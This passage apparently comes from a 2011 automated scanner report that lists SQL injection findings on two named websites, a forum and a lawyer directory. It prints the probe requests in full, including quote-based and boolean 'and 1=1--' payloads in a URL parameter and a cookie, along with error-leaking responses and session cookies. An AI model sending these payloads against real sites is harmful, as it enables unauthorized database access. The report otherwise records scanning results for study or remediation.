<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...
1.36. http://www.longislanderotic.com/longislanderotic/forum/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.longislanderotic.com
Path:   /longislanderotic/forum/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /longislanderotic/forum/?1'=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.longislanderotic.com/landing.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 17:41:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=efc3z65eb36ceab8e62a99b818zc4eb7; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=ONLDCGFBHGAPBLNKKPJJONAE; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...

Request 2

GET /longislanderotic/forum/?1''=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
Referer: http://www.longislanderotic.com/landing.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 302 Object moved
Date: Sun, 17 Apr 2011 17:41:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /
Content-Length: 122
Content-Type: text/html
Set-Cookie: WWF=LV=2011%2D04%2D17+10%3A41%3A58&SID=887zfz45ce4875zdc99b2bd9b8d9cc6a; expires=Tue, 17-Apr-2012 17:41:58 GMT; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSBBADSQ=AOLDCGFBMHDHDJAMCOGFAOGM; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/">here</a>.</body>
1.37. http://www.martindale.com/all/c-england/all-lawyers-6.htm [WT_FPC cookie]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.martindale.com
Path:   /all/c-england/all-lawyers-6.htm

Issue detail

The WT_FPC cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WT_FPC cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /all/c-england/all-lawyers-6.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795'%20and%201%3d1--%20; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response 1

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:06:57 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104161006577283200&InitialSearchId=201104161006577283200; domain=.martindale.com; expires=Sat, 16-Apr-2011 15:01:57 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90557
Connection: close
X-RE-Ref: 1 -1412311559
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<script src="/WebResource.axd?d=ttrY3SqlCSzMAoytm_r1Hi7gKACu6gPO6DAlL6NjZW-0xWrTfdlUxMz0gF7EkE_zPxlC0lra6YHy0D1px5oruGw3uQI1&amp;t=634228788175197513" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PcmQdoPWHyXJjcbV1epKPQO677Sgwz2PPqwANCTCgVSNtq825aCTwbl1fCESIdT0HxYKmOObAFJiISRJJBiInholPHEiMlW6GXy78cooaQv5s8h5BE35w5b8sQm3CTHXi0IuiV2M_RS0x7vOOcR7LF0BjsZ5QW8XfXLnIA-VOMXzDqi60&amp;t=39eafb99" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=EYYpP-3X86UzFUXXZefM7z-mS_lh-3oCh0f8zhvYRNZe16v-OSJUXu_0DlJDz4fVSKOIIWbHMDrYtdiYnJ8z9wO-NaDac5vQu10xv1ctzl09SveLbV3tsPliY-GDxKIrPVqpJYzOCyopeWiMS3EQNTdAs3chiCbcWEDNWBlQgy43ThM80&amp;t=39eafb99" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PquHbk0or_noNvcjPl_IKIjbmVN7srILqgFi7XyYyyx6YvKdcR-KjDfCMtVlZ8v8jSdRyeMcDrz-JGZbHiEFalWDZDvCg1lxWPdV1CUUsL3qPvM-kvUx9lfuKZe7R2skP5hDFA2&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=o9vGyGLo2nBhPaAPX6cH8DPnQ48wpH8Y5XC8ILocHjdXjsHQlNRwgXPSZ3JTmmAuRukvrOCbhnM74XinZl6TWsy2osBdv5DSYtGCFrk4GBu5PXQ-sXtJDCkkYjd9bVjsl1BRO9yNYnyJPzsbkOxhRGXB6fs1&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=1LpIWY5tbZwpcbOqeN0AeHSDy06QhDhe_ITrEmBK9oMPw9NzOXVp5RkKcOYo0ssmR4MYfKtntwxhH7vYcc6Ql3vbDMbEJMwfH0XZRozEm3H4nUUiwfyj9gbyKWiXXWaDbRQTahLP04t82dGm3_xkChB5q1c1&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=CK4xLZ0bj0C8vfyRZSW9pmL9lVGs81e4812CMWE4StLmDtx93l2ZqVJmC-Eti9Dg_zqHrRST8Z_JD6Jyvt6oJiEYy92_gqfdnKLBZFRLL3Qhx-4noYMbpNxLpIb5gbVaTlojFS8gPa5UlUIA9qCkY-1N2eigP13CehjdWsiH9kTTG_Im0&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=y-UXbTxhK5M_D1kaBFIqR-kaFqVBfwtIjXia51APqXv3xVdC6qwe7cdilKKkGPmGC4UWovaLI2fC26vA9EgEWMbVWaEfV0kCf9-pI1sBpIJToLJuElCii-SV02sQmjB-QVcyAoD_0LZ_IQ04FYB8xMMHi6Q1&amp;t=2023dd1f" type="text/javascript"></script>
<div>

   <input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="O0ElUY-CViJhrbKOah3QqCV3tKHyIKnMMKo9Du2fUpIoMb43B5f0q-0y_gS109gBaKT8aKikbArI8s1cxDNvZS-nej81" />
   <input type="hidden" name="__EVEN
...[SNIP]...

Request 2

GET /all/c-england/all-lawyers-6.htm HTTP/1.1
Host: www.martindale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: op397mdcsearchresultsliid=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utmz=205508303.1302905514.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MH_survey_MDC64=0; mdc_session_id=e42928a5acac4e6598b36e4172c30143; browser_id=4536f10003b84d77a65f457425f341af; CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=&InitialSearchId=; refDomain=www.martindale.com; WT_FPC=id=173.193.214.243-1374343632.30143633:lv=1302961739374:ss=1302961642795'%20and%201%3d2--%20; op397mdcsearchresultsgum=a00y02z086274fm0zw4ywe274gi0dv3yy7ea4; __utma=205508303.24449278.1302905514.1302912242.1302961643.3; __utmc=205508303; ASP.NET_SessionId=l5lymsy25kgocbinie2xhi2d; __utmb=205508303.2.10.1302961643;

Response 2

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:06:58 GMT
Server: www.martindale.com 9999
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSStatsCookie=BrowserId=4536f10003b84d77a65f457425f341af&SessionId=e42928a5acac4e6598b36e4172c30143&ReferringDomain=www.martindale.com&ProviderId=LL2&SearchId=201104161006577283502&InitialSearchId=201104161006577283502; domain=.martindale.com; expires=Sat, 16-Apr-2011 15:01:58 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=iso-8859-1
Content-Length: 90569
Connection: close
X-RE-Ref: 1 -1411708512
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   england all a
...[SNIP]...
<script src="/WebResource.axd?d=ttrY3SqlCSzMAoytm_r1Hi7gKACu6gPO6DAlL6NjZW-0xWrTfdlUxMz0gF7EkE_zPxlC0lra6YHy0D1px5oruGw3uQI1&amp;t=634228860769687366" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PcmQdoPWHyXJjcbV1epKPQO677Sgwz2PPqwANCTCgVSNtq825aCTwbl1fCESIdT0HxYKmOObAFJiISRJJBiInholPHEiMlW6GXy78cooaQv5s8h5BE35w5b8sQm3CTHXi0IuiV2M_RS0x7vOOcR7LF0BjsZ5QW8XfXLnIA-VOMXzDqi60&amp;t=ffffffff81484381" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=EYYpP-3X86UzFUXXZefM7z-mS_lh-3oCh0f8zhvYRNZe16v-OSJUXu_0DlJDz4fVSKOIIWbHMDrYtdiYnJ8z9wO-NaDac5vQu10xv1ctzl09SveLbV3tsPliY-GDxKIrPVqpJYzOCyopeWiMS3EQNTdAs3chiCbcWEDNWBlQgy43ThM80&amp;t=ffffffff81484381" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PquHbk0or_noNvcjPl_IKIjbmVN7srILqgFi7XyYyyx6YvKdcR-KjDfCMtVlZ8v8jSdRyeMcDrz-JGZbHiEFalWDZDvCg1lxWPdV1CUUsL3qPvM-kvUx9lfuKZe7R2skP5hDFA2&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=o9vGyGLo2nBhPaAPX6cH8DPnQ48wpH8Y5XC8ILocHjdXjsHQlNRwgXPSZ3JTmmAuRukvrOCbhnM74XinZl6TWsy2osBdv5DSYtGCFrk4GBu5PXQ-sXtJDCkkYjd9bVjsl1BRO9yNYnyJPzsbkOxhRGXB6fs1&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=1LpIWY5tbZwpcbOqeN0AeHSDy06QhDhe_ITrEmBK9oMPw9NzOXVp5RkKcOYo0ssmR4MYfKtntwxhH7vYcc6Ql3vbDMbEJMwfH0XZRozEm3H4nUUiwfyj9gbyKWiXXWaDbRQTahLP04t82dGm3_xkChB5q1c1&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=CK4xLZ0bj0C8vfyRZSW9pmL9lVGs81e4812CMWE4StLmDtx93l2ZqVJmC-Eti9Dg_zqHrRST8Z_JD6Jyvt6oJiEYy92_gqfdnKLBZFRLL3Qhx-4noYMbpNxLpIb5gbVaTlojFS8gPa5UlUIA9qCkY-1N2eigP13CehjdWsiH9kTTG_Im0&amp;t=2023dd1f" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=y-UXbTxhK5M_D1kaBFIqR-kaFqVBfwtIjXia51APqXv3xVdC6qwe7cdilKKkGPmGC4UWovaLI2fC26vA9EgEWMbVWaEfV0kCf9-pI1sBpIJToLJuElCii-SV02sQmjB-QVcyAoD_0LZ_IQ04FYB8xMMHi6Q1&amp;t=2023dd1f" type="text/javascript"></script>
<div>

   <input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="O0ElUY-CViJhrbKOah3QqCV3tKHyIKnMMKo9Du2fUpIoMb43B5f0q-0y_gS109gBaKT8aKikbArI8s1cxDNvZS-nej81" />
   <input type="hidd
...[SNIP]...
Report generated by XSS.CX at Sun Apr 17 13:22:00 CDT 2011.